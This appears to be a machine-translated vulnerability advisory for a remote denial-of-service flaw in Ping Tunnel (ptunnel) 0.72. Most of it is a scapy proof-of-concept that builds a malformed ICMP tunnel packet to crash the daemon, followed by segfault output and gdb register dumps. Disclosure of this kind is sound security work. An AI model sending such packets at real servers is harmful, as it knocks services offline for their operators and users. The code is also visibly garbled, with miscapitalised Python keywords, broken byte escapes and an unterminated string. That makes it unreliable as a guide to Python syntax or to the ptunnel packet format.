Ping Tunnel (ptunnel) ICMP packet processing DoS Vulnerability

Release date:
Updated on:

Affected Systems:
Freecode Ping Tunnel 0.72
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54627

Ping Tunnel is a reliable TCP Connection Tool for Tunnel effect. It connects to a remote host through ICMP echo requests and response packets, commonly known as ping requests and replies.

A remote denial of service vulnerability exists in ptunnel 0.72 and other versions. Attackers can exploit this vulnerability to cause the affected applications to crash.

<* Source: st3n
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

St3n () provides the following test methods:

#===================================================== ==========================================================
# PoC code (scapy)
#===================================================== ==========================================================

From scapy. all import *
Conf. verbose = 0

# Arg?
If len (sys. argv) <1:
Sys. exit ('usage: % s

# Target
Remote_host = sys. argv [1]

# Ptunnel. h
# Typedef struct {
# Uint32_t magic, // magic number, used to identify ptunnel packets.
# Dst_ip, // destination IP and port (used by proxy to figure
# Dst_port, // out where to tunnel)
# State, // current connection state; see constants above.
# Ack, // sequence number of last packet encoded ed from other end
# Data_len; // length of data buffer
# Uint16_t seq_no, // sequence number of this packet
# Id_no; // id number, used to separate different tunnels from each other
# Char data [0]; // optional data buffer
#}_ _ Attribute _ (packed) ping_tunnel_pkt_t;

# Build packet
Magic = '\ xd5 \ x20 \ x08 \ 8080'
Dst_ip = 'aaa'
Dst_port = 'bbbbbb'
State = 'cccccc' # <=== this trigger the vulnerability
Ack = '\ x00 \ x00 \ xff'
Data_len = '\ x00 \ x00 \ x00 \ x00'
Seq_id = 'dddd'
Pkt = IP (dst = remote_host)/ICMP ()/Raw (magic)/Raw (dst_ip)/Raw (dst_port)/Raw (state)/Raw (ack) /Raw (data_len)/Raw (seq_id)

# Edevil packet
Send (pkt)

#===================================================== ========================================
# Example & Info
#===================================================== ========================================

# Sending edevil packet
#-------------------

# $ Sudo./ptunnel-dos.py 127.0.0.1
#.
# Sent 1 packets.

 

# Daemon side
#-----------

# $ Ptunnel-c lo
# [Inf]: Starting ptunnel v0.72.
# [Inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [Inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [Inf]: Forwarding incoming ping packets over TCP.
# [Inf]: Initializing pcap.
# [Inf]: Ping proxy is listening in privileged mode.
# Segmentation fault

# Debug info
#-----------

# Program received signal SIGSEGV, Segmentation fault.
# Handle_packet (buf = 0x80774a0 "E", bytes = 56, is_pcap = 1, addr = 0xbff65c, icmp_sock = 7) at ptunnel. c: 957
#957 pt_log (kLog_sendrecv, "Recv: % d [% d] bytes [seq = % d] [type = % s] [ack = % d] [icmp = % d] [user = % s] [pcap = % d] \ n ",
# (Gdb)
# (Gdb) I r
# Eax 0x3434343 54739779
# Ecx 0x0 0
# Edx 0x3434343 54739779
# Ebx 0x8050184 134545796
# Esp 0xbffff380 0xbffff380
# Ebp 0xbffff468 0xbff468
# Esi 0 xffff 65535
# Edi 0xbffff5c8-1073744440
# Eip 0x804cdfa 0x804cdfa # Eflags 0x10202 [if rf]
# Cs 0x73 115
# Ss 0x7b 123
# Ds 0x7b 123
# Es 0x7b 123
# Fs 0x0 0
# Gs 0x33 51

# Eof

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Freecode
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://freecode.com/projects/